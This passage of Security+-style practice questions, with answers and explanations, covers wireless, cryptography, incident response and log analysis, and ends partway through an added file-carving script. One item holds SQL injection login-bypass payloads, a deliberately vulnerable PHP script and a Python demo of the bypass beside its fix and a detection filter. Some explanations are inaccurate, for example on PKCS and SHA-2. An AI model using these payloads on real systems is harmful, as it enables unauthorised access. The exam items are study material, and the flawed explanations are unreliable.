OBJ-5.8: The Gramm-Leach-Bliley Act (GLBA) is a United States federal law that requires financial institutions to explain how they share and protect their customers' private information. The Health Insurance Portability and Accountability Act (HIPAA) is a US law designed to provide privacy standards to protect patients' medical records and other health information provided to health plans, doctors, hospitals, and other health care providers. Sarbanes-Oxley (SOX) is a United States federal law that set new or expanded requirements for all US public company boards, management, and public accounting firms. The Family Educational Rights and Privacy Act (FERPA) of 1974 is a United States federal law that governs the access to educational information and records by public entities such as potential employers, publicly funded educational institutions, and foreign governments.

46
Q

In an effort to improve the security of the Dion Training corporate network, a security administrator wants to update the configuration of their wireless network to have IPSec built into the protocol by default. Additionally, the security administrator would like for NAT to no longer be required for extending the number of IP addresses available. What protocol should the administrator implement on the wireless network to achieve their goals?

WEP
IPv6
WPA2
IPv4

A

IPv6
OBJ-2.1: IPv6 includes IPSec built into the protocol by default. Additionally, IPv6 also provides an extended IP address range for networks, which eliminates the need for using NAT. IPv4 does not include IPSec or extended IP address ranges by default. WPA2 is the most modern and secure version of wireless encryption for WiFi networks, but it doesn’t include IPSec or extended IP address ranges by default. WEP is an older version of wireless encryption for WiFi networks and doesn’t provide these features by default, either.

47
Q

Dion Training has an open wireless network called “InstructorDemos” for its instructors to use during class, but they do not want any students connecting to this wireless network. The instructors need the “InstructorDemos” network to remain open since some of their IoT devices used during course demonstrations do not support encryption. Based on the requirements provided, which of the following configuration settings should you use to satisfy the instructor’s requirements and prevent students from using the “InstructorDemos” network?

Signal strength
MAC filtering
QoS
NAT

A

MAC filtering
OBJ-6.3: Since the instructors need to keep the wireless network open, the BEST option is to implement MAC filtering to prevent the students from connecting to the network while still keeping the network open. Since the instructors would most likely use the same devices to connect to the network, it would be relatively easy to implement a MAC-filtering-based whitelist of devices that are allowed to use the open network and reject any other devices not listed by the instructors (like the students' laptops or phones). Reducing the signal strength would not solve this issue since students and instructors are both in the same classrooms. Using Network Address Translation and Quality of Service will not prevent the students from accessing or using the open network.

48
Q

A penetration tester hired by a bank began searching for the bank's IP ranges by performing lookups on the bank's DNS servers, reading news articles online about the bank, monitoring what times the bank's employees came into and left work, searching job postings (with a special focus on the bank's information technology jobs), and even searching the dumpster at the bank's corporate office. Based on this description, what portion of the penetration test is being conducted?

Active information gathering
Passive information gathering
Vulnerability assessment
Information reporting

A

Passive information gathering

OBJ-1.4: Passive information gathering consists of numerous activities where the penetration tester gathers information that is open-source or publicly available, without the organization under investigation being aware that the information has been accessed. Active information gathering instead starts to probe the organization using techniques like DNS Enumeration, Port Scanning, and OS Fingerprinting. Vulnerability assessments are another form of active information gathering. Information reporting occurs after the penetration test is complete, and it involves writing a final report with the results, vulnerabilities, and lessons learned during the assessment.

49
Q

Your company just launched a new invoicing website for use by your five largest vendors. You are the cybersecurity analyst and have been receiving numerous phone calls that the webpage is timing out, and the website overall is performing slowly. You have noticed that the website received three million requests in just 24 hours, and the service has now become unavailable for use. What do you recommend should be implemented to restore and maintain the availability of the new invoicing system?

Intrusion Detection System
VPN
MAC filtering
Whitelisting

A

Whitelisting
OBJ-2.4: By implementing whitelisting of the authorized IP addresses for the five largest vendors, they will be the only ones who will be able to access the webserver. This can be done by creating rules in the Access Control List (ACL) to deny ALL other users except these five vendors, thereby dropping a large number of requests from any other IP addresses, such as those from an attacker. Based on the description in the scenario, it appears that the system is under some form of denial of service attack, but by implementing a whitelist at the edge of the network and blackholing any traffic from IP addresses that are not whitelisted, the server will no longer be overwhelmed or perform slowly when responding to legitimate requests. MAC filtering is only applicable at layer 2 of the OSI model (which would not work for traffic being sent over the internet from your vendors to your server). A VPN is a reasonable solution to help secure the connection between the vendors and your systems, but it will not deal with the DoS condition being experienced. An intrusion detection system may detect the DoS condition, but an IDS cannot resolve the condition (whereas an IPS could).

50
Q

Which cloud computing concept is BEST described as focusing on replacing the hardware and software required when creating and testing new applications and programs from a customer’s environment with cloud-based resources?

SaaS
SECaaS
IaaS
PaaS

A

PaaS
OBJ-3.7: Platform as a Service (PaaS) provides the end-user with a development environment without all the hassle of configuring and installing it themselves. If you want to develop a customized or specialized program, PaaS helps reduce the development time and overall costs by providing a ready to use platform.

51
Q

What popular open-source port scanning tool is commonly used for host discovery and service identification?

nmap
dd
services.msc
Nessus

A

nmap
OBJ-2.2: The world’s most popular open-source port scanning utility is nmap. The Services console (services.msc) allows an analyst to disable or enable Windows services. The dd tool is used to copy files, disk, and partitions, and it can also be used to create forensic disk images. Nessus is a proprietary vulnerability scanner developed by Tenable. While Nessus does contain the ability to conduct a port scan, its primary role is as a vulnerability scanner, and it is not an open-source tool.

52
Q

Your organization has recently been the target of a spearphishing campaign. You have identified the website associated with the link in the spearphishing emails and want to block it. Which of the following techniques would be the MOST effective in this situation?

URL filter
Application blacklist
Quarantine
Containment

A

URL filter
OBJ-2.3: A URL filter can be used to block a website based on its website address or uniform resource locator (URL). This is not a containment technique, but a blocking and filtering technique. Quarantine would be used against an infected machine, and it would not be effective for blocking access to a given website across the entire organization. An application blacklist is used to prevent an application from running, so it cannot be used to block a single malicious or suspicious website or URL.

53
Q

A penetration tester has been hired to conduct an assessment, but the company wants to exclude social engineering from the list of authorized activities. Which of the following documents would include this limitation?

Service level agreement
Memorandum of understanding
Acceptable use policy
Rules of engagement

A

Rules of engagement
OBJ-1.4: While the network scope given in the contract documents will define what will be tested, the rules of engagement define how that testing is to occur. Rules of engagement can state things like no social engineering is allowed, no external website scanning, etc. A memorandum of understanding (MOU) is a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve the exchange of money. A service level agreement contains the operating procedures and standards for a service contract. An acceptable use policy is a policy that governs employees' use of company equipment and internet services.

54
Q

A hacker successfully modified the sale price of items purchased through your company's web site. During the investigation that followed, the security analyst verified that neither the web server nor the Oracle database was compromised directly. The analyst also found no attacks that could have caused this during their log review of the Intrusion Detection System (IDS). What is the most likely method that the attacker used to change the sale price of the items purchased?

SQL injection
Changing hidden form values
Cross-site scripting
Buffer overflow attack

A

Changing hidden form values

OBJ-2.4: Since there are no indications in the IDS logs, the database, or the server, it is most likely that the hacker changed hidden form values to change the price of the items in the shopping cart. A buffer overflow is an anomaly that occurs when a program overruns the buffer’s boundary and overwrites adjacent memory locations while writing data to a buffer. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications in which malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker.

55
Q

You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636. The security scanning software recommends that you remediate this by changing user authentication to port 636 wherever technically possible. What should you do?

Change all devices and servers that support it to port 636 since port 389 is a reserved port that requires root access and can expose the server to privilege escalation attacks

Mark this as a false positive in your audit report since the services that typically run on ports 389 and 636 are identical

Change all devices and servers that support it to port 636 since encrypted services run by default on port 636

Conduct remediation actions to update encryption keys on each server to match port 636

A

Change all devices and servers that support it to port 636 since encrypted services run by default on port 636

OBJ-2.6: LDAP can be run on either port 389 or port 636. Port 389 is the standard port for LDAP but typically runs unencrypted LDAP services over this port. Instead, you should change all devices and servers that can technically support the change to port 636, since LDAP services over port 636 are encrypted by default.

56
Q

When conducting forensic analysis of a hard drive, what tool would BEST prevent changing the contents of the hard drive during your analysis?

Software write blocker
Forensic drive duplicator
Hardware write blocker
Degausser

A

Hardware write blocker

OBJ-5.5: Both hardware and software write blockers are designed to ensure that forensic software and tools cannot change a drive inadvertently by accessing it. However, since the question indicates that you need to choose the BEST solution to protect the contents of the drive from being changed during analysis, you should pick the hardware write blocker. The primary purpose of a hardware write blocker is to intercept and prevent (or 'block') any modifying command operation from ever reaching the storage device. A forensic drive duplicator simply copies a drive and validates that the copy matches the original drive, but it cannot be used by itself during analysis. A degausser is used to wipe magnetic media. Therefore, it should not be used on the drive since it would erase the contents of the hard drive.

57
Q

Which of the following authentication protocols was developed by Cisco to provide authentication, authorization, and accounting services?

Kerberos
RADIUS
TACACS+
CHAP

A

TACACS+

OBJ-4.2: TACACS+ is an extension to TACACS (Terminal Access Controller Access Control System) and was developed as a proprietary protocol by Cisco. The Remote Authentication Dial-In User Service (RADIUS) is a networking protocol that operates on port 1812 and provides centralized Authentication, Authorization, and Accounting management for users who connect to and use a network service, but it was not developed by Cisco. Kerberos is an open-source network authentication protocol designed at MIT. The Challenge-Handshake Authentication Protocol (CHAP) is used to authenticate a user or network host to an authenticating entity. CHAP is an authentication protocol but does not provide authorization or accounting services.

58
Q

Which of the following hashing algorithms results in a 128-bit fixed output?

MD-5
SHA-1
SHA-2
RIPEMD

A

MD-5

OBJ-6.2: MD-5 creates a 128-bit fixed output. SHA-1 creates a 160-bit fixed output. SHA-2 creates a 256-bit fixed output. RIPEMD creates a 160-bit fixed output.

59
Q

What technology is NOT PKI x.509 compliant and cannot be used in a variety of secure functions?

Blowfish
SSL/TLS
AES
PKCS

A

Blowfish

OBJ-6.4: AES, PKCS, and SSL/TLS are all compatible with x.509 and can be used in a wide variety of functions and purposes. AES is used for symmetric encryption. PKCS is used as a digital signature algorithm. SSL/TLS is used for the secure key exchange.

60
Q

Which of the following cryptographic algorithms is classified as symmetric?

RSA
Blowfish
ECC
PGP

A

Blowfish

OBJ-6.2: Blowfish is a symmetric-key block cipher, designed in 1993 by Bruce Schneier and included in many cipher suites and encryption products. ECC, PGP, and RSA are all asymmetric algorithms.

61
Q

Which of the following authentication mechanisms involves receiving a one-time use shared secret password, usually through a token-based key fob or smartphone app, that does not expire?

TOTP
EAP
Smart card
HOTP

A

HOTP

OBJ-4.3: The HMAC-based One-time Password algorithm (HOTP) is an algorithm for token-based authentication. The authentication server and the client token are configured with the same shared secret, and the token can be a fob-type device or a smartphone app. An HOTP code is derived from a counter, not a clock, so it remains valid until it is used (or the server's counter moves past it). The later Time-based One-time Password (TOTP) variant replaces the counter with the current time step, so each code expires on its own after the step length (typically 30 seconds).

62
Q

The local electric power plant contains both business networks and ICS/SCADA networks to control their equipment. Which technology should the power plant’s security administrators look to implement first as part of configuring better defenses for the ICS/SCADA systems?

Intrusion prevention system
Log consolidation
Automated patch deployment
Anti-virus software

A

Intrusion prevention system

OBJ-3.5: Since this question is focused on the ICS/SCADA network, the best solution is to implement an intrusion prevention system on that network. ICS/SCADA protocols use a small, predictable set of commands to control equipment, so strict IPS rules can block any command or traffic pattern that falls outside the known set. (Because a false positive on an inline IPS can itself interrupt plant operations, such rules are normally tuned in detect-only mode before blocking is enabled.) Log consolidation is a good idea, but it won't prevent an issue and therefore isn't the most critical thing to add first. Automated patch deployment should not be used, because patches must be tested against ICS/SCADA systems before they are applied; patches frequently break ICS/SCADA functionality. Anti-virus software may or may not be able to run on the equipment, since many ICS/SCADA devices do not run a standard operating system such as Windows.

63
Q

A security analyst is conducting a log review of the company's web server and found two suspicious entries:

[12Jun2020 10:07:23] "GET /logon.php?user=test'+oR+7>1%20-- HTTP/1.1" 200 5825
[12Jun2020 10:10:03] "GET /logon.php?user=admin';%20-- HTTP/1.1" 200 5845

The analyst contacts the web developer and asks for a copy of the source code to the logon.php script. The script is as follows:

<?php
include('../../config/db_connect.php');
$user = $_GET['user'];
$pass = $_GET['pass'];
$sql = "SELECT * FROM USERS WHERE username = '$user' AND password = '$pass'";
$result = mysql_query($sql) or die("couldn't execute query");
if (mysql_num_rows($result) != 0)
    echo 'Authentication granted!';
else
    echo 'Authentication failed!';
?>

Based on source code analysis, which type of vulnerability is this web server vulnerable to?

SQL injection
Command injection
LDAP injection
Directory traversal

A

SQL injection

OBJ-1.2: Based on the log entries, an attacker attempted SQL injection against logon.php. Notice the single quote (') in the user parameter, which closes the string literal inside the query, and the comment marker (--) that discards the rest of the statement, including the password check. In the script, $user and $pass are concatenated directly into the SQL text with no input validation or parameterisation, so whatever the attacker supplies becomes part of the query. The HTTP 200 responses show the page processed the input but do not by themselves prove the bypass worked; compare the response bodies or the database logs to confirm. Command injection is an attack whose goal is the execution of arbitrary commands on the host operating system via a vulnerable application; both are injection attacks, but SQL injection targets the database query rather than the operating system shell. LDAP injection is a code injection technique used to exploit web applications that could reveal sensitive user information or modify information represented in the LDAP (Lightweight Directory Access Protocol) data stores. Directory traversal or path traversal is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server's root directory.
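To see exactly why the first log entry works and what the fix looks like, here is an added example (not the page's PHP and not a real application) that reproduces the logon.php query against an in-memory SQLite table, then shows the parameterised version and a small log-hunting filter. SQLite stands in for MySQL; the `--` comment works in both (MySQL additionally requires a space after it, which is why the payload carries `%20`). The user table and its passwords are constructed for the demo.

```python
import re
import sqlite3
import urllib.parse


def connect_demo_db() -> sqlite3.Connection:
    """Constructed in-memory USERS table standing in for db_connect.php's database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE USERS (username TEXT, password TEXT)")
    con.executemany("INSERT INTO USERS VALUES (?, ?)",
                    [("admin", "S3cr3t!"), ("jason", "hunter2")])
    return con


def login_vulnerable(con: sqlite3.Connection, user: str, pw: str) -> bool:
    # Mirrors logon.php: untrusted input is spliced straight into the SQL text.
    sql = f"SELECT * FROM USERS WHERE username = '{user}' AND password = '{pw}'"
    return len(con.execute(sql).fetchall()) != 0


def login_safe(con: sqlite3.Connection, user: str, pw: str) -> bool:
    # Parameterised query: values travel separately from the statement, so a quote
    # in the input is data, never syntax. (Passwords should also be hashed, not stored plain.)
    sql = "SELECT * FROM USERS WHERE username = ? AND password = ?"
    return len(con.execute(sql, (user, pw)).fetchall()) != 0


# A quote followed by a tautology, a statement terminator, or a comment marker.
SQLI_HINT = re.compile(r"'\s*(?:or\s+\S+\s*[=<>]\s*\S+|;|--)", re.IGNORECASE)


def looks_like_sqli(log_line: str) -> bool:
    """Hunting filter for web/proxy logs: URL-decode first, then look for the pattern.
    This is a triage aid for the analyst, not a substitute for fixing the query."""
    return bool(SQLI_HINT.search(urllib.parse.unquote_plus(log_line)))


if __name__ == "__main__":
    db = connect_demo_db()
    payload = "test' oR 7>1 -- "        # first entry from the log, decoded
    print("vulnerable:", login_vulnerable(db, payload, "anything"))   # True: bypassed
    print("safe      :", login_safe(db, payload, "anything"))         # False
```

With the payload the vulnerable statement becomes `... WHERE username = 'test' oR 7>1 -- ' AND password = 'anything'`; everything after `--` is a comment, `7>1` is always true, and the row count is non-zero for every user in the table.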

64
Q

What is a major security risk that could occur when you comingle hosts/servers with different security requirements in a single network?

Privilege creep
Password compromises
Security policy violations
Zombie attacks

A

Security policy violations
OBJ-2.3: A network is only as strong as its weakest link (or host/server). When you comingle hosts/servers with different security requirements, there is a large risk of security policy violations. Users become accustomed to the less stringent policy that applies to one set of machines and carry those habits over to a machine that should be held to a stronger policy, and a compromise of a low-security host gives an attacker a foothold on the same segment as the high-security ones.

65
Q

What is the correct order of the Incident Response process?

Identification, Containment, Eradication, Preparation, Recovery, and Lessons Learned

Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned

Containment, Eradication, Identification, Lessons learned, Preparation, and Recovery

Lessons Learned, Recovery, Preparation, Identification, Containment, and Eradication

A

Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned

OBJ-5.4: The proper order of the Incident Response process is Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned. Concepts with lists of steps are common questions asked as an ordering or a drag and drop question on the exam. For example, the steps of an incident response, the order of volatility, or the strength of encryption schemes could be asked using this question format.

66
Q

Which authentication mechanism does 802.1x usually rely upon?

TOTP
HOTP
EAP
RSA

A

EAP

OBJ-4.3: The IEEE 802.1X Port-based Network Access Control framework establishes several ways for devices and users to be securely authenticated before they are permitted full network access. The actual authentication mechanism will be some variant of the Extensible Authentication Protocol (EAP). EAP allows lots of different authentication methods, but many of them use a digital certificate on the server and/or client machines. This allows the machines to establish a trust relationship and create a secure tunnel to transmit the user authentication credential.

67
Q

Consider the following snippet from a log file collected on the host with the IP address of 10.10.3.6. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Time: Jun 12, 2020 09:24:12 Port:20 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP Time: Jun 12, 2020 09:24:14 Port:21 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP Time: Jun 12, 2020 09:24:16 Port:22 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP Time: Jun 12, 2020 09:24:18 Port:23 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP Time: Jun 12, 2020 09:24:20 Port:25 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP Time: Jun 12, 2020 09:24:22 Port:80 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP Time: Jun 12, 2020 09:24:24 Port:135 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP Time: Jun 12, 2020 09:24:26 Port:443 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP Time: Jun 12, 2020 09:24:26 Port:445 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- What type of activity occurred based on the output above?

Port scan targeting 10.10.3.2
Port scan targeting 10.10.3.6
Denial of service attack targeting 10.10.3.6
Fragmentation attack targeting 10.10.3.6

A

Port scan targeting 10.10.3.6

OBJ-2.2: Port scanning is the technique used to identify open ports and services available on a network host. Based on the logs, you can see a sequential scan of commonly used ports (20, 21, 22, 23, 25, 80, 135, 443, 445) from the same source, roughly two seconds apart. The source of the scan is 10.10.3.2 and the destination is 10.10.3.6, making "Port scan targeting 10.10.3.6" the correct choice. IP fragmentation attacks are a form of denial of service in which the attacker overwhelms a target by abusing the datagram fragmentation and reassembly mechanism. A denial-of-service (DoS) attack occurs when legitimate users are unable to access information systems, devices, or other network resources due to the actions of a malicious actor.

68
Q

Which of the following Wireshark filters should be applied to a packet capture to detect applications that are sending passwords in cleartext to a REST API located at 10.1.2.3?

http.request.method=="POST" && ip.dst=10.1.2.3
ip.proto=tcp
ip.dst=10.1.2.3
http.request.method=="POST"

A

http.request.method=="POST" && ip.dst=10.1.2.3

OBJ-2.2: Filtering the available PCAP with just the HTTP "POST" method would display any data sent when accessing a REST API, regardless of the destination IP. Filtering with just the desired IP address would show all traffic to that host (10.1.2.3). Combining both narrows the display to data posted to the API at 10.1.2.3. A filter on ip.proto for TCP would display all TCP traffic, regardless of port or address, which is far too much to analyse. Two practical notes: Wireshark's equality operator is written == (or eq), so the working filter is http.request.method == "POST" && ip.dst == 10.1.2.3; and Wireshark can only dissect the HTTP body if the API is served over plain HTTP. If the connection uses TLS, the password is encrypted on the wire and the capture would need the session keys to decode it, which is exactly why cleartext credentials over HTTP are the finding being hunted for.

69
Q

Which protocol is paired with OAuth2 to provide authentication of users in a federated identity management solution?

ADFS
SAML
Kerberos
OpenID Connect

A

OpenID Connect
OBJ-4.2: OAuth 2 is an authorization framework for delegated access to resources; it does not define how the end user is authenticated, and the contents of its access tokens are not standardized. OpenID Connect (OIDC) is an authentication layer built on top of the OAuth 2 flows: it adds an ID token (a signed JWT with precisely defined claims such as the issuer, subject, audience and expiry) so that the client learns who the user is, not just what it may access. Security Assertion Markup Language (SAML) is an open standard for exchanging authentication and authorization data between parties, in particular between an identity provider and a service provider; SAML is an XML-based markup language for security assertions. Active Directory Federation Services (ADFS) is a software component developed by Microsoft that runs on Windows Server to provide users with single sign-on access to systems and applications located across organizational boundaries. Kerberos is a computer network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.

70
Q

You are creating a script to filter some logs so that you can detect any suspected malware beaconing. Which of the following is NOT a typical means of identifying a malware beacons behavior on the network?

The beacon’s persistence
The beaconing interval
The removal of known traffic
The beacon’s protocol

A

The beacon’s protocol

OBJ-1.4: The beacon's protocol is not typically a means of identifying a malware beacon. A beacon can be sent over numerous protocols, including ICMP, DNS, HTTP, and many others. Unless you specifically knew the protocol used by the suspected beacon, filtering by the protocol seen in the logs could eliminate malicious behavior prematurely. Other factors, such as the beacon's persistence (whether it resumes after the system reboots) and the beaconing interval (how regularly the connections recur, and how little that interval varies), are much better indicators for fingerprinting a malicious beacon. Removing known traffic in the script also reduces the amount of data the analyst has to review, making it easier to spot the beacon without wasting time on non-malicious traffic.
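As an added example of the interval-based approach (this is illustration code written for this page, not the script the question refers to and not any vendor's detection), the function below groups outbound connection records by source and destination, drops destinations on an allowlist ("removal of known traffic"), and flags pairs whose inter-arrival times are nearly constant. The protocol column is deliberately ignored. The traffic records, the allowlisted addresses, the 60-second period and the jitter threshold are all constructed assumptions for the demo; persistence across reboots is a host-side check and is not modelled here.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

# "Removal of known traffic": destinations we already understand (internal DNS, patch
# server). Constructed addresses for this example.
KNOWN_GOOD = {"10.0.0.53", "10.0.0.80"}


def beacon_candidates(records, min_events=6, max_jitter=0.20, allowlist=KNOWN_GOOD):
    """records: iterable of (timestamp, src, dst, proto) outbound connection events.
    Flags (src, dst) pairs whose inter-arrival times are nearly constant. The protocol
    is ignored on purpose: a beacon looks the same over DNS, HTTP or ICMP."""
    by_pair = defaultdict(list)
    for ts, src, dst, _proto in records:
        if dst in allowlist:
            continue
        by_pair[(src, dst)].append(ts)

    hits = []
    for (src, dst), times in by_pair.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        jitter = statistics.pstdev(gaps) / mean          # coefficient of variation
        if jitter <= max_jitter:
            hits.append({"src": src, "dst": dst, "count": len(times),
                         "interval_s": round(mean, 1), "jitter": round(jitter, 3)})
    return hits


def sample_records():
    """Constructed traffic for the demo (not real captures)."""
    base = datetime(2020, 6, 12, 9, 0, 0)
    recs = []
    # Suspected implant: ~60 s period with a few seconds of jitter, rotating protocols.
    offsets = [0, 2, -1, 3, -2, 1, 0, -3, 2, 1, -1, 0]
    protos = ["DNS", "HTTP", "ICMP"]
    for i, off in enumerate(offsets):
        recs.append((base + timedelta(seconds=60 * i + off),
                     "10.10.3.20", "203.0.113.5", protos[i % 3]))
    # Ordinary browsing: bursty, irregular gaps.
    t = base
    for gap in [5, 200, 12, 900, 40, 3, 660]:
        t += timedelta(seconds=gap)
        recs.append((t, "10.10.3.21", "198.51.100.7", "HTTP"))
    # Legitimate periodic traffic to the internal DNS server, removed by the allowlist.
    for i in range(12):
        recs.append((base + timedelta(seconds=60 * i), "10.10.3.21", "10.0.0.53", "DNS"))
    return recs


if __name__ == "__main__":
    for hit in beacon_candidates(sample_records()):
        print(hit)
```

Running it with the allowlist emptied makes the scheduled DNS traffic show up as a second, perfectly regular candidate, which is why removing known traffic matters: periodicity alone also describes plenty of legitimate automation.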

71
Q

Which of the following vulnerability scans would provide the best results if you want to determine if the target’s configuration settings are correct?

Credentialed scan
External scan
Internal scan
Non-credentialed scan

A

Credentialed scan

OBJ-1.5: Credentialed scans log in to the target and read its configuration directly (installed packages, registry and policy settings, running services), so they give the most accurate picture of whether the settings are correct. Non-credentialed scans can only infer configuration from what is observable over the network, such as banners and responses, which can be incomplete, outdated, or deliberately altered. Whether the scanner sits inside or outside the network does not change its ability to read configuration, so internal versus external is not the deciding factor here.

72
Q

You are reviewing the logs in your IDS and see that there were entries showing SYN packets received from a remote host targeting each port on your web server from 1 to 1024. Which of the following MOST likely occurred?

UDP probe
SYN flood
Port scan
Remote host cannot find the right service port

A

Port scan

OBJ-2.2: Based on the description provided, this is most likely a port scan. Using a tool like nmap, an attacker can create a SYN scan across every port in a range against the desired target. A port scan or SYN scan may trigger an alert in your IDS. While scanners support more stealthy scans, default scans may connect to each port sequentially. The other options are incorrect because a remote host will typically connect to only a single port associated with a service, a SYN flood normally sends many SYNs to a single system but doesn’t send them to unused ports, and a UDP probe will not send SYN packets.
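The same detection logic serves both this question and the host log shown in question 67: group connection attempts by source and destination and alert when one pair touches many distinct ports within a short window. The block below is an added example written for this page (not an IDS rule from any product); it parses lines in the exact format of the question-67 log, and also generates a constructed log of the question-72 scenario (one SYN per port, 1 through 1024) to show the same function catching it. The 60-second window and five-port threshold are assumptions chosen for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches the host log format shown in question 67.
LINE = re.compile(
    r"Time:\s*(?P<ts>[A-Za-z]{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\s+"
    r"Port:\s*(?P<port>\d+)\s+Source:\s*(?P<src>[\d.]+)\s+"
    r"Destination:\s*(?P<dst>[\d.]+)\s+Protocol:\s*(?P<proto>\w+)")


def parse(lines):
    for line in lines:
        m = LINE.search(line)
        if m:
            yield (datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S"),
                   int(m["port"]), m["src"], m["dst"], m["proto"])


def find_port_scans(lines, min_ports=5, window=timedelta(seconds=60)):
    """One alert per (src, dst) pair that touches at least min_ports distinct
    destination ports inside any `window`-long span."""
    events = defaultdict(list)
    for ts, port, src, dst, _proto in parse(lines):
        events[(src, dst)].append((ts, port))
    alerts = []
    for (src, dst), hits in events.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            ports = {p for t, p in hits[i:] if t - start <= window}
            if len(ports) >= min_ports:
                alerts.append({"src": src, "dst": dst, "start": start,
                               "ports": sorted(ports)})
                break
    return alerts


# Constructed log: the nine entries from question 67 plus two benign HTTPS connections.
SAMPLE_LOG = [
    "Time: Jun 12, 2020 09:24:12 Port:20 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP",
    "Time: Jun 12, 2020 09:24:14 Port:21 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP",
    "Time: Jun 12, 2020 09:24:16 Port:22 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP",
    "Time: Jun 12, 2020 09:24:18 Port:23 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP",
    "Time: Jun 12, 2020 09:24:20 Port:25 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP",
    "Time: Jun 12, 2020 09:24:22 Port:80 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP",
    "Time: Jun 12, 2020 09:24:24 Port:135 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP",
    "Time: Jun 12, 2020 09:24:26 Port:443 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP",
    "Time: Jun 12, 2020 09:24:26 Port:445 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP",
    "Time: Jun 12, 2020 09:24:30 Port:443 Source: 10.10.3.9 Destination:10.10.3.6 Protocol:TCP",
    "Time: Jun 12, 2020 09:25:02 Port:443 Source: 10.10.3.9 Destination:10.10.3.6 Protocol:TCP",
]


def sequential_syn_scan(src="10.10.3.2", dst="10.10.3.6", first=1, last=1024):
    """Constructed log of the question-72 scenario: one SYN per port, about 20 ports/second."""
    base = datetime(2020, 6, 12, 9, 30, 0)
    return [
        f"Time: {(base + timedelta(seconds=(p - first) // 20)).strftime('%b %d, %Y %H:%M:%S')} "
        f"Port:{p} Source: {src} Destination:{dst} Protocol:TCP"
        for p in range(first, last + 1)
    ]


if __name__ == "__main__":
    for alert in find_port_scans(SAMPLE_LOG) + find_port_scans(sequential_syn_scan()):
        print(alert["src"], "->", alert["dst"], len(alert["ports"]), "ports from", alert["start"])
```

The benign host that reconnects to port 443 twice never trips the threshold, while the scanning host does with the first nine lines; the generated 1 to 1024 sweep produces a single alert listing every port.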

73
Q

An attacker has compromised a virtualized server. You are conducting forensic analysis as part of the recovery effort but found that the attacker deleted a virtual machine image as part of their malicious activity. Which of the following challenges do you now have to overcome as part of the recovery and remediation efforts?

File formats used by some hypervisors cannot be analyzed with traditional forensic tools

The attack widely fragmented the image across the host file system

All log files are stored within the VM disk image, therefore, they are lost

You will need to roll back to an early snapshot and then merge any checkpoints to the main image

A

The attack widely fragmented the image across the host file system

OBJ-5.5: Because the VM disk image was deleted, you now have to rely on file carving or other data recovery techniques to get the virtual server back. Large disk images are frequently fragmented across the host file system, and once the file is deleted those blocks are free to be reused, so a carver may recover only partial, non-contiguous data; if the host uses a proprietary file system such as VMFS on ESXi, tool support is further limited. VM instances are most useful when they are elastic (spun up on demand and destroyed without preserving local data once their task is done), which can also mean lost system logs; to prevent this, VMs should ship their logs to an external syslog server or file rather than keeping them only on the virtual disk. Virtual machine file formats are image-based and written to mass storage. Depending on the configuration and VM state, you merge any checkpoints into the main image using a hypervisor tool rather than rolling back to an old snapshot, and then roll forward. It is possible to load VM data into a memory analysis tool such as Volatility, although the file formats used by some hypervisors require conversion first, or may not be supported by the tool.
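File carving itself is simple to demonstrate. The block below is an added example written for this page, not a forensic tool's code: a header/footer carver run over a constructed byte "image" that contains a small JPEG, a small PNG, and an orphaned JPEG header whose trailer has been lost. The sample files and the filler bytes are constructed for the demo and are not real images; real carvers (and real VMDK/VHD recovery) also have to cope with fragmentation, which is exactly what the orphaned header stands in for.

```python
import hashlib

# Header / trailer byte signatures for two common file types.
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9"),
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"),   # IEND chunk plus its fixed CRC
}


def carve(image: bytes, max_size: int = 16 * 1024 * 1024):
    """Header/footer carving over a raw byte image. Returns (found, truncated):
    found    = [(kind, offset, data, sha256)] for files whose header and trailer both exist
    truncated = [(kind, offset)] for headers with no trailer inside max_size, which is
    what a fragmented or partly overwritten image looks like to a carver."""
    found, truncated = [], []
    for kind, (head, tail) in SIGNATURES.items():
        pos = 0
        while (start := image.find(head, pos)) != -1:
            end = image.find(tail, start + len(head), start + max_size)
            if end == -1:
                truncated.append((kind, start))
                pos = start + 1
                continue
            end += len(tail)
            data = image[start:end]
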